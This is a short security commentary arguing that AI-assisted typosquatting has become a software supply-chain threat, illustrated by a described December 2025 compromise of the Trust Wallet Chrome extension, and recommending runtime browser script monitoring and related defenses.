Typosquatting Is No Longer a User Problem. It's a Supply Chain Problem

Typosquatting, once a nuisance that relied on users mistyping URLs, has morphed into a sophisticated supply‑chain threat. By leveraging large‑language models, attackers can spin up thousands of visually identical domains in minutes, register them, obtain SSL certificates, and embed the malicious hosts inside legitimate third‑party JavaScript or npm packages. The speed of this workflow is staggering: a full campaign can be launched in under ten minutes, and malicious package uploads to public repositories have surged 156 % year‑over‑year, outpacing manual vetting processes. This convergence of AI and open‑source ecosystems forces a rethink of traditional threat models.

The real danger became evident in December 2025 when the Trust Wallet Chrome extension was compromised. A self‑replicating npm worm, Shai‑Hulud, stole GitHub tokens and Chrome Web Store credentials, then pushed a trojanized version of the wallet extension through the official store. Because the extension passed Google’s verification, it executed inside users’ browsers, silently siphoning seed phrases to a look‑alike analytics domain. Within 48 hours, 2,500 wallets were emptied, costing $8.5 million, while firewalls, WAFs, and CSP logs showed no anomaly. The incident also highlighted how compromised extensions can bypass multi‑factor authentication by harvesting seed phrases directly from the browser.

Enterprises can no longer rely on perimeter defenses alone. The missing piece is runtime behavioral monitoring that watches what approved scripts actually do in the browser—tracking outbound domains, DOM element access, and deviations from established baselines. Deploying Subresource Integrity for self‑hosted assets, auditing newly registered CDN domains, and feeding CSP violation reports into a SIEM are practical first steps, but they must be complemented by continuous script‑level telemetry. Investing in machine‑learning‑driven anomaly detection for script behavior further reduces the window of exposure. As AI‑driven typosquatting scales, organizations that gain visibility into in‑browser execution will be the ones that stop the next $10 million theft.